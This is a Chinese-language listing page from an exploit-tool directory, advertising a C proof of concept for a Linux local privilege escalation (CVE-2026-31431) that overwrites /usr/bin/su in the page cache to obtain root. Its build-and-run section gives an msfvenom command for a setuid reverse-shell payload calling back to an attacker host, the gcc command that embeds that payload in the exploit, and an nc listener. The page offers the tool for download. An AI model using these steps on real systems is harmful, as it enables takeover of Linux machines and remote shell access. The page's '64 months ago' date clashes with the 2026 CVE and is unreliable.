Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-31431 — CVE-2026-31431 的 C PoC,一种无特权 Linux LPE,利用 AF_ALG 页缓存损坏来覆盖 /usr/bin/su 并获取 root 权限。 | Kitploit
工具/GitHubGitHub/mcub3/cve-2026-31431
权限提升漏洞利用框架漏洞分析漏洞利用Payload 开发二进制利用
GitHubmcub3/cve-2026-31431

CVE-2026-31431

CVE-2026-31431 的 C PoC,一种无特权 Linux LPE,利用 AF_ALG 页缓存损坏来覆盖 /usr/bin/su 并获取 root 权限。

查看仓库
64个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-31431(Copy Fail)— C PoC

通过 AF_ALG 中的逻辑漏洞(内核 4.14 → 2026 年初),向任意可读文件的页缓存写入 4 个受控字节,实现无需特权的本地权限提升(LPE)。

破坏内存中的 /usr/bin/su,然后运行它 → 获得 root 权限。

Exploit 截图

构建与运行

root@kitploit:~
# 1. 生成 ELF payload(反向 shell 示例)
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> PrependSetuid=true \
    PrependSetgid=true -f elf -a x86 --platform linux -o payload_x86

# 2. 编译(静态、去除符号、payload 通过 .incbin 嵌入)
gcc -m32 -static -Wl,--strip-all -DPAYLOAD_FILE=payload_x86 -o copy_fail_x86 copy_fail.c

# 3. 先在目标主机上启动监听(nc -lvp <LPORT>),再运行 exploit
./copy_fail_x86

关键细节

• CVE:CVE-2026-31431 • CVSS:7.8 • 修复:提交 a664bf3d603d

• 适用于 2017–2026 年间几乎所有 Linux 发行版(包括容器)。

• 技术原理:以 O_RDONLY 打开 /usr/bin/su,滥用 AEAD 就地解密,将精心构造的 payload 直接拼接进页缓存,绕过 VFS。

• 原始披露及 732 字节 Python PoC → https://copy.fail

许可证

MIT — 参见 LICENSE。 仅限教育用途 / 授权测试。使用风险自负。

下载工具